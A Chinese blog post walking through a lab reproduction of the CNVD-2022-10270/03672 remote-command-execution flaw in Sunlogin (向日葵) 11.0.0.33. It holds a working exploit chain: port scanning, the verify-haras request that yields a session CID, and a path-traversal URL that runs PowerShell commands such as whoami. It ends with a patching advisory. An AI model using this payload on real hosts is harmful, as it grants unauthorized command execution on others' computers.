欢迎光临散文网 会员登陆 & 注册

向日葵CNVD-2022-10270/CNVD-2022-03672 复现

2023-07-21 09:01 作者:逍遥子大表哥  | 我要投稿


向日葵是生活工作中最常用的一款远程办公工具之一。也是目前国内市面上用的最多的一款工具。本文来谈谈关于其CNVD-2022-10270/CNVD-2022-03672漏洞的利用和复现。

实验环境

  • 向日葵 <= 11.0.0.33

  • Kali Linux

端口扫描

我们首先在本地环境安装11.0.0.33的低版本向日葵。安装完成后,并用nmap对靶场进行端口扫描。

安装完成后,在kali中利用nmap端口扫描。

nmap -p 45000-55000 192.168.50.105

如下图,我们可以看到目标存在61376 61387这几个端口。

当然,为了方便我们可以利用python脚本快速检测,支持整个网段扫描。



漏洞复现

在浏览器中访问ip+端口号+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID

通过上述方法,我们确定了目标的端口。现在我们便可以利用payload工具进行测试。payload

http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami

访问paylaod,并在burp中进行抓包。

修改Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344ZlCookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl 效果如下:

同样,我们只需修改后面的whoami为其他的命令如ipconfig即可。

ifconfig命令
dir命令

安全建议

此漏洞算是比较高危的漏洞,请尽快更新到最新版本。

更多精彩文章 欢迎关注微信公众号 kali黑客笔记

向日葵CNVD-2022-10270/CNVD-2022-03672 复现的评论 (共 条)

分享到微博请遵守国家法律